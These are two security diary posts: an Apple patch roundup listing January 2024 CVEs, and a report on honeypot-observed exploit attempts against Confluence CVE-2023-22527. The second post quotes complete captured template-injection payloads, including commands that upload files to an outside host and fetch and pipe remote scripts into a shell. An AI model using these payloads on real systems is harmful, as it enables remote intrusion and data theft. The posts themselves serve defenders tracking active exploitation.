Apple Updates Everything - New 0 Day in WebKit

Published: 2024-01-22. Last Updated: 2024-01-22 21:54:12 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Today, Apple released significant "point releases" for all its operating systems. With new features, we also got patches for 29 different vulnerabilities. The table below shows how some vulnerabilities affect multiple operating systems across the Apple ecosystem. 

Three of the vulnerabilities are known to be already exploited, one of which is new, according to Apple:

CVE-2024-23222: This WebKit type-confusion vulnerability has already been exploited and is being patched in macOS as well as iOS.

CVE-2023-42916 and CVE-2023-42917 have been exploited against iOS versions before 16.7.1. These vulnerabilities are not new and were patched in newer versions of iOS and macOS in the past. They are not being patched for iOS/iPadOS 15.8

 

iOS 17.3 and iPadOS 17.3 iOS 16.7.5 and iPadOS 16.7.5 iOS 15.8.1 and iPadOS 15.8.1 macOS Sonoma 14.3 macOS Ventura 13.6.4 macOS Monterey 12.7.3 watchOS 10.3 tvOS 17.3
CVE-2024-23212 [important] Apple Neural Engine
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges
x x   x x x x x
CVE-2024-23218 [moderate] CoreCrypto
A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions.
An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key
x     x     x x
CVE-2024-23208 [important] Kernel
The issue was addressed with improved memory handling.
An app may be able to execute arbitrary code with kernel privileges
x     x     x x
CVE-2024-23207 [moderate] Mail Search
This issue was addressed with improved redaction of sensitive information.
An app may be able to access sensitive user data
x     x x x x  
CVE-2024-23223 [moderate] NSSpellChecker
A privacy issue was addressed with improved handling of files.
An app may be able to access sensitive user data
x     x     x x
CVE-2024-23219 [moderate] Reset Services
The issue was addressed with improved authentication.
Stolen Device Protection may be unexpectedly disabled
x              
CVE-2024-23211 [moderate] Safari
A privacy issue was addressed with improved handling of user preferences.
A user's private browsing activity may be visible in Settings
x x   x     x  
CVE-2024-23203 [moderate] Shortcuts
The issue was addressed with additional permissions checks.
A shortcut may be able to use sensitive data with certain actions without prompting the user
x     x        
CVE-2024-23204 [moderate] Shortcuts
The issue was addressed with additional permissions checks.
A shortcut may be able to use sensitive data with certain actions without prompting the user
x     x     x  
CVE-2024-23217 [moderate] Shortcuts
A privacy issue was addressed with improved handling of temporary files.
An app may be able to bypass certain Privacy preferences
x     x     x  
CVE-2024-23215 [important] TCC
An issue was addressed with improved handling of temporary files.
An app may be able to access user-sensitive data
x     x     x x
CVE-2024-23210 [moderate] Time Zone
This issue was addressed with improved redaction of sensitive information.
An app may be able to view a user's phone number in system logs
x     x     x x
CVE-2024-23206 [moderate] WebKit
An access issue was addressed with improved access restrictions.
A maliciously crafted webpage may be able to fingerprint the user
x x   x     x x
CVE-2024-23213 [critical] WebKit
The issue was addressed with improved memory handling.
Processing web content may lead to arbitrary code execution
x x   x     x x
CVE-2024-23214 [critical] WebKit
Multiple memory corruption issues were addressed with improved memory handling.
Processing maliciously crafted web content may lead to arbitrary code execution
x x   x        
CVE-2024-23222 [critical] WebKit
A type confusion issue was addressed with improved checks.
Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.
x x   x x x   x
CVE-2023-42937 [moderate] Accessibility
A privacy issue was addressed with improved private data redaction for log entries.
An app may be able to access sensitive user data
  x     x x    
CVE-2023-38545 [moderate] curl
Multiple issues were addressed by updating to curl version 8.4.0.
Multiple issues in curl
  x     x x    
CVE-2023-38039 [moderate] curl
Multiple issues were addressed by updating to curl version 8.4.0.
Multiple issues in curl
  x     x x    
CVE-2023-38546 [moderate] curl
Multiple issues were addressed by updating to curl version 8.4.0.
Multiple issues in curl
  x     x x    
CVE-2023-42915 [moderate] curl
Multiple issues were addressed by updating to curl version 8.4.0.
Multiple issues in curl
  x     x x    
CVE-2023-42888 [important] ImageIO
The issue was addressed with improved checks.
Processing a maliciously crafted image may result in disclosure of process memory
  x     x x    
CVE-2023-42916 [moderate] WebKit
An out-of-bounds read was addressed with improved input validation.
Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.
    x          
CVE-2023-42917 [critical] WebKit
A memory corruption vulnerability was addressed with improved locking.
Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited against versions of iOS before iOS 16.7.1.
    x          
CVE-2024-23224 [moderate] Finder
The issue was addressed with improved checks.
An app may be able to access sensitive user data
      x x      
CVE-2024-23209 [critical] LLVM
The issue was addressed with improved memory handling.
Processing web content may lead to arbitrary code execution
      x        
CVE-2023-40528 [important] Core Data
This issue was addressed by removing the vulnerable code.
An app may be able to bypass Privacy preferences
        x      
CVE-2023-42935 [moderate] LoginWindow
An authentication issue was addressed with improved state management.
A local attacker may be able to view the previous logged in user?s desktop from the fast user switching screen
        x      
CVE-2023-42887 [moderate] NSOpenPanel
An access issue was addressed with additional sandbox restrictions.
An app may be able to read arbitrary files
        x      

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

0 comment(s)

Scans/Exploit Attempts for Atlassian Confluence RCE Vulnerability CVE-2023-22527

Published: 2024-01-22. Last Updated: 2024-01-22 15:20:40 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Last week (January 16th), Atlassian released it's January 2024 Security Bulletin. Included with the bulletin was a patch for CVE-2023-22527, a remote code execution vulnerability in Confluence Data Center and Confluence Server. Atlassian assigned a CVSS score of 10.0 to the vulnerability. Exploitation does not require authentication [1].

The update fixed a template injection vulnerability. Similar vulnerabilities have been patched in Atlassian products in the past. Confluence, like most (all?) Atlassian products are written in Java. Java, particularly the Struts framework, uses OGNL (Object-Graph Navigation Language) to represent Java objects. An attacker able to inject an arbitrary OGNL object can execute Java code.

Yesterday, more details regarding the vulnerability were released, including proof of concept code [2[. The proof of concept code was created by reversing the patch Atlassian had released. The blog post highlighted how the "/template/aui/text-inline.vm" URL can be used to execute arbitrary code. 

Following the release of this blog post, we saw an increase in exploit attempts in our honeypots. For example:

POST /template/aui/text-inline.vm HTTP/1.1
Host: [victim IP]:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 320
Accept-Encoding: gzip, deflate
Connection: close

label=aaa'%2B#request.get('.KEY_velocity.struts2.context').internalGet('ognl').findValue(#parameters.poc[0],{})%2b'&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader('Cmd-Ret',(new freemarker.template.utility.Execute()).exec({"pwd > 778.txt && curl -F "file=@./778.txt" http://www.p0b1ic.com/1.php"}))

This is just a simple "vulnerability scan," exporting the current directory to www.p0blic.com if the victim is vulnerable. But we have seen other payloads as well:

label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=(new freemarker.template.utility.Execute()).exec({"echo -n Y3VybCAtcyBodHRwOi8vMTk1LjIxMS4xMjQuMTg0L2FhIHx8IHdnZXQgLXEgLU8tIGh0dHA6Ly8xOTUuMjExLjEyNC4xODQvYWE= | base64 -d | sh"})

The base64 string decodes to 

curl -s http://195.211.124.184/aa || wget -q -O- http://195.211.124.184/aa

, which sadly can no longer be found.

A third payload also leads to a no longer available URL (it is unique for each request, which is why I obfuscated part of it):

 label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl cmn524vcgnq5jr6edd00kx5[obfuscated[5jt.oast.fun"})

In addition, there are the usual requests to execute "id" and "whoami"

PATCH NOW... (and assume compromise if you find an unpatched system)

[1] https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
[2] https://www.ctfiot.com/158511.html

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Keywords:
0 comment(s)
ISC Stormcast For Monday, January 22nd, 2024 https://isc.sans.edu/podcastdetail/8818

Comments


Diary Archives